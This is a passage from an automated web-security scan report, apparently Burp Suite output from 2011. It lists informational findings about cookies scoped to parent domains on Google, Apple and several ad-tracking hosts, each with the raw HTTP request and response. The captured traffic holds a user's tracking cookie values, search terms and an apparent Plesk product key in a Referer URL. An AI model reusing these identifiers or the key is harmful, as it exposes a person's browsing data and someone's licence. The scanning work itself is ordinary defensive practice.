The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=https%3A%2F%2F174.36.18.902006%2FWizard%2FStart%3FsiteId%3D92907014f563ac53317555e74a1a1a26
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=3sKS7bI5pvhoRuaaVyOwnANTv3IHSjqlT0AOE4t_=ZEgwkR1lBvPg8GAt; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=rlT8MZiINKBIrkeXfgIJb9vgNjpXk4t90QexqxjC=nlt533ILJA5-O8o1; expires=Sun, 25-Dec-2011 02:02:42 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 25 Jun 2011 02:02:42 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
12.27. http://id.google.com/verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Spilgames+Internet
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=Ur4zoaTzXz_ZUyr_bNG71B00g2QyNve9JxirvLXQ=SpcSyPrhNUXVqSHO; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=3sKS7bI5pvhoRuaaVyOwnANTv3IHSjqlT0AOE4t_=ZEgwkR1lBvPg8GAt; expires=Sat, 24-Dec-2011 13:26:11 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:26:11 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
12.28. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=4761888b-4251-4912-8743-09bf2fc2ed75 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1308573230578&e90=1308838755219&e50=1308573231659&e100=1308838755889

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; domain=.interclick.com; expires=Fri, 25-Jun-2021 02:14:00 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 25 Jun 2011 02:13:59 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
12.29. http://images.apple.com/global/nav/styles/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=354
Expires: Fri, 24 Jun 2011 13:33:51 GMT
Date: Fri, 24 Jun 2011 13:27:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=DM6tKPNIkmYZsEVSBSdYOGJ7OTa7PjwA2735gwg+B3srHhFj8YVJDLNI3Wi2SUB1dCqrK7+XltzB/RcTVZmzUffySHH1UmBafoYJMj8YHYwt2pGgPse/fGM3FRGKsYngf6a77lbqVf66I18XlDNjfSTbjjIE0caGcGeQC4Ga/6t7SQdMOjY9JN8DEVW1UMoc6rrdnREZK82vJpIYTfG0q24uni8l6skyzHr5oYaAtC+cEVmOYnxcZEVM/0zwt8pWHHT7wAgPsXOSwDVj2beSsp5/JZ2hxDkV+qJm/gvvlB5s4gKqlC/OkT9MmT5nrCzrHJRdC+dWafIqs+ExZSu4RsRpt+yRsvm+2Ebw4C2MVPVg6mUwoEFIRaz9PCY0pRAq3LXUGVhUO8khrTSYOT60ngG/28nSEmej8riAE3H3pM3Ek1xzfTDSN4w9rduEpmRVOFjfLPb+A3mPF99al/pIw2PdnTJ0NQXeRkmztMT8xZeLjBS/B0mP+3zsHAYthpfDX9LIuH2xTPXrpJX2DeMFKurDBc9hP5LjsnlklHcD2q0g+oy0qYkWk5CBKjp+akzk; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

12.30. http://images.apple.com/ipod/images/gradient_texture20100901.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /ipod/images/gradient_texture20100901.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipod/images/gradient_texture20100901.jpg HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]
Range: bytes=2714-2714
If-None-Match: "a9a-48f2afe054800"

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 01 Sep 2010 04:18:40 GMT
ETag: "a9a-48f2afe054800"
Server: Apache/2.2.14 (Unix)
X-N: S
Content-Length: 2714
Content-Type: image/jpeg
Cache-Control: max-age=492
Expires: Fri, 24 Jun 2011 13:36:09 GMT
Date: Fri, 24 Jun 2011 13:27:57 GMT
Connection: close
Set-Cookie: ccl=aJq+T0MKyuiZKEYbLPS03BsnrndkJJe79OF9a4ljFx2tXfiewibK/oLDQsuQHmvLldfmwr3Fy4L0VzGE/FZAmwGvg5eyINeUs6H9+NrRWh7L5rDRBVyuVYqUQ1MwgXZBWE62uEPzY/1srrhHHhDAA10Ed8INN9tddP9eMAan54eOY4CWr5NEeR7RrB9iQTG6DtqTjlAmG+4nNyVZ7jdIh9TtfBW5ttsnApQ+ss6WBwgVTe5XpPrqo6vXs2WkEODHPu2ZTusaew7hlMVTuZRtMsPrG6LtM+2d8bscqWCj9F3eRoX0D8U/rG61IMxp3iNbUfq17yxUGCepcoJpg7GPEIhyCmfIbzlT60df9tGrUeptBxvQJpz6OE9lkpl+jYRzKh1DGjK7WAFpJ5xH1Kah4ZCmugxzD3GHW8pK1NjHPUjSHa3Smmrzk7TAkG42vB8Pcmr55JDy/baPOrMw+rWTRiwgHGZT5gn0erArWxdwwcWIFgXTn4E5/SnP7yr92JudF1hKiiLCcbaD+7DP9RQAV5cMn+xkVVCm1M4Z3+tinPFItTpDIztx2jS0mCWnhZOf; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................{.$..
...[SNIP]...
12.31. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dE361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; sess=1; uuid2=3420415245200633085; anj=Kfw)(BAfzI)_c:>YTQ8o9HI:j3Rd8gS=zfXihHsxM81LUQF9wtljE8<[9QgfpqS2HD7RgjO6UmrXplCnP$OBPv9`B`EcP`20sqmn`0A*=p-s1a3^i6HJ$o:ZH*W'mLq=2/=:*Ktve0`y<wiFQIHXHs4Sql-BZ-3'pfeBGUI'6#^/xw?0$!1jg6ERz:32x2S:@Q=-Lk2l`'R#V*']Bct8dIPsrw)DsL6mA9)'NgwW@MOpG/d'G?mm0ZPFj*qGoqQC^#TDIPC<oef.T<+.TWA3mz*6mre/9I/+dcKFbH@hjL*Wx%0.7K@L2I]or2_X$y2+i)!nFb`XWc:Gm!l#EljWaPrrpeaj<Wgq31OWpF+Y:rK>6NF>RW9bA+Hb3C>jZ-p=st1-]]8oRJ6EQ)DSt-Di4V]b6(qzCeK@GY*@qaj86c$W6gk>YRb1P:mG#jFsCtJeXzuFvt2jG-W+%e2k$-DDS)f/clIvy87JLzjO$w7BTd7<h%s4a>Cv%(1vzu#S9OUti[mX0*9Q[ss/Tv7vM0#/-8-vI(2B[=oU6k)RIvSo[*^Pv5H0:^blrQO!b*vb52-vNvuOh`IjH+%hA]..t4+'KGhT@?2!%>z(x84ihPGqQ*qx$lbALU!.1+T5EmuVL@YM2HK.$bb2oxUP71*A)^VE@C!P%mTf_GMkYDUta=IL

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:54 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:54 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:18:54 GMT

GIF89a.............!.......,........@..L..;
12.32. http://media.fastclick.net/w/get.media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/get.media

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/get.media?sid=56553&m=6&tp=8&d=j&t=n HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lyc=BwAAAAR47gNOACAAAXBfIASgAAdBUwAAwPX1TUAOAbRHQAWAAABKIAYBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcBoUXgAQsBvUTgAQsDeVcAAA==; pjw=BAEAAAACIAMDlZAETiAGAQABIAMCkbAEYAcCRcEIIA1AEwEAAA==; adv_ic=BxEAAACVkAROIAYGAAFJAACGYSAHIAtAAAM/zNdNQAdAFwH0WSAHQAwgAAAC4AIXAM3gAhcBw8vgAS8BaVrgAS8AseACFwHIYOABFwCg4AIXAbRWIFcgW0AAADjgAhcB61zgARcAMeACFwH7X+ABRwAk4AIXANjgAl8AA+ACFwA24AIvAdzK4AGnANPgAr8A2eACFwA+4AK/ANPgAhcAjCEpwKcA0OACFwFHU+ABjwDM4AIXAaJS4AEXAMngAhcA4+ACjwFsseABjwTNTwAACkEEAgAAAA==; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:01 GMT
Content-Type: application/x-javascript
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 297
Set-Cookie: pjw=BAIAAAACIAMDj5EETiAGAQABIAMCkbAEYBMCRcEIIA2AEwCV4AIfAYStgB8BcbqAHwMGAAAA; domain=.fastclick.net; path=/; expires=Sun, 26-Jun-2011 13:31:01 GMT
Set-Cookie: adv_ic=BxIAAACVkQROIAYJAAFJAABAYQAAAiALQAAAj+ACFwCG4AIXAz/M101AH0AvAfRZIAdADCAAAALgAhcAzeACFwHDy+ABLwFpWuABLwCx4AIXAchg4AEXAKDgAhcBtFYgVyBbQAAAOOACFwHrXOABFwAx4AIXAftf4AFHACTgAhcA2OACXwAD4AIXADbgAi8B3MrgAacA0+ACvwDZ4AIXAD7gAr8A0+ACFwCMIUHApwDQ4AIXAUdT4AGPAMzgAhcBolLgARcAyeACFwDj4AKPAWyx4AGPBM1PAAAKQQQCAAAA; domain=.fastclick.net; path=/; expires=Sat, 23-Jun-2012 13:31:01 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:31:01 GMT

{var dz=document;
dz.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid
...[SNIP]...
12.33. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=17597;evt=17799;cat1=22392;cat2=22393;rand=[CACHEBUSTER] HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=315899333
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adv_ic=BwYAAAC3stdNIAYGAAFJAADrXCAHIAtAAAGiseABFwGMTuABFwCR4AIXAeNf4AEXAGzgAhcEzU8AAApARCAAAF/gAhcBtFbgAS8AKeACFwF4XcAXAQAA; lyc=BwAAAATA9fVNACAAAbRHIASgAABKIAcBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcHoUUAAKrsA05AEQFwX0AFgAABQVOAB0AA4AUXAQAA; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:39 GMT
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=CAAAAAR47gNOACAAAXBfIASgAAdBUwAAwPX1TUAOAbRHQAWAAABKIAYBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcGoUUAAI2QBGCPAb1E4AEXAXlX4AEL4AUXAQAA; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:30:39 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:30:39 GMT

GIF89a.............!.......,...........D..;
12.34. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3 HTTP/1.1
Host: network.realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
Cookie: OAX=rcHW804Ekc4ABIzz; NXCLICK2=011Qa6UK; NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Fri, 24 Jun 2011 13:32:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: NXCLICK2=011Qa6Uv; expires=Mon, 24-Jun-13 13:32:37 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
Content-Length: 345
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 13:33:37 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...
12.35. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=647111455;fpan=0;fpa=P0-1728005155-1308921999956;ns=0;url=http%3A%2F%2Fwww.redorbit.com%2Fnews%2Fbusiness%2F1993118%2Fspil_games_selects_adyens_internet_payment_system_for_global_social%2F;ref=;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1308922015580;tzo=300;a=p-c0n-0mxg7_y5A HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EEIBswEBiAeB0g4eqT0eThwirRfeKVpIfjDbQKs_YIYACUCkAOZ80iYTCOFdHhDRDhDRy0lDAOEQkdEOVPMNG7MKXhQDBQSEXzPRThAP0w6fKkENpPXaOHENkpGdKRA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://bh.contextweb.com/bh/set.aspx?action=add&advid=357&token=EHEX1
Set-Cookie: d=EOYBrwEBiAeB0g4eqT0eThwijElqSH4w20CrP2CGAAlApADmfNImEwjhXR4Q0Q4Q0ctJQwDhEJHRDlTzDRuzCl4UAwUEhF8z0U4QD9MOnypBDaT12jhxDZKRnSkQ; expires=Thu, 22-Sep-2011 13:26:54 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Fri, 24 Jun 2011 13:26:54 GMT
Server: QS

12.36. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=E3F32BD05A8DDF4D5646D79640088B&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; put_1185=4325897289836481830; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; csi15=3140642.js^2^1308614600^1308614602; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; rpb=7259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%263672%3D1%264894%3D1; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%263672%3D12881%2C0%2C1%2C7%2C%264894%3D12881%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%263672%3D1%264894%3D1%266286%3D1; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.rubiconproject.com
